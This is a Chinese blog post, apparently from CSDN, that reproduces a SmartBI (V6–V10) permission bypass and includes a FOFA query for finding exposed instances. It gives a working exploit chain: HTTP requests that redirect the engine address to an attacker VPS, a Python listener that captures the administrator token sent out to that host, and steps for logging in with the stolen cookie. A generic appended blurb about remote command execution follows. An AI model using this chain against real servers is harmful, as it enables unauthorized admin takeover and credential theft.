SmartBI 权限绕过漏洞复现

 0x01 产品简介

   Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。

0x02 漏洞概述

    Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。  

0x03 影响范围

  V6 <= Smartbi <= V10

0x04 复现环境

FOFA:app="SMARTBI"

0x05复现过程

1.通过爱站网发现txxx.xx归属于xxx数字科技有限公司,如同所示:

2.漏洞URL:http://00.00.00.00/general/login/index.php 

  1. 利用poc

更新内部引擎地址

POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1

Host: your-ip

Content-Type: application/json

 

http://vpsip:8000

查看是否更新成

POST /smartbi/smartbix/api/monitor/engineInfo HTTP/1.1

Host: your-ip

Content-Type: application/json

 在vps上启动脚本

import json

from http.server import BaseHTTPRequestHandler, HTTPServer

 

class RequestHandler(BaseHTTPRequestHandler):

    def do_POST(self):

        content_length = int(self.headers['Content-Length'])

        post_data = self.rfile.read(content_length).decode('utf-8')

        print(f'Received data: {post_data}')

 

        # 解析post_data,并构建要返回的JSON数据

        data = json.loads(post_data)

        response = {'message''Data received successfully'}

 

        # 设置响应头和状态码

        self.send_response(200)

        self.send_header('Content-type''application/json')

        self.end_headers()

 

        # 将JSON数据转换为字节流并发送回客户端

        self.wfile.write(json.dumps(response).encode('utf-8'))

 

def run_server():

    server_address = ('', 8000)

    httpd = HTTPServer(server_address, RequestHandler)

    print('Server is running...')

    httpd.serve_forever()

 

if __name__ == '__main__':

    run_server()

开启监听,发送token

POST /smartbi/smartbix/api/monitor/token HTTP/1.1

Host: your-ip

Content-Type: application/json

 得到管理员cookie

验证是否可用

POST /smartbi/smartbix/api/monitor/login HTTP/1.1

Host: your-ip

Content-Type: application/json

 

获取到的管理员token

 替换cookie

刷新,成功进入

 

 0x06 修复建议

 目前官方已修复以上漏洞,受影响用户可以升级更新到安全版本。

  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
SmartBI是一种企业级的商业智能系统软件,用于数据分析和报告生成。近期,SmartBI被发现存在远程命令执行漏洞。 该漏洞的存在使得攻击者可以通过构造恶意的命令,并通过远程访问的方式执行这些命令,从而获取系统权限并进行未授权操作。这可能导致许多安全风险,包括未经授权的数据访问、敏感信息泄漏、系统瘫痪等。 远程命令执行漏洞通常是由于软件代码中的缺陷或不安全配置导致的。在SmartBI的情况下,攻击者可以通过用户输入参数中的特殊字符来注入恶意命令,由于软件没有对这些输入进行充分的验证和过滤,导致了漏洞的存在。 为了防止此类漏洞的利用,SmartBI的开发者应该加强对用户输入的验证与过滤。验证用户输入的合法性,确保输入中不包含任何潜在的恶意命令,如特殊字符、命令标识符等。此外,软件应该限制命令执行的权限,只允许执行必要的操作,并保证执行环境的安全性。 对于用户来说,应该及时更新SmartBI软件到最新版本,以获取安全补丁和修复。此外,用户在使用SmartBI时应保持警惕,避免点击不明链接、下载可疑附件,以及及时报告任何异常情况。 总之,SmartBI远程命令执行漏洞的存在给企业数据安全带来了潜在威胁。开发者需要加强软件的安全性设计和防护措施,而用户则应该保持警惕并采取合适的安全措施来最大程度地降低风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝阳挽歌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值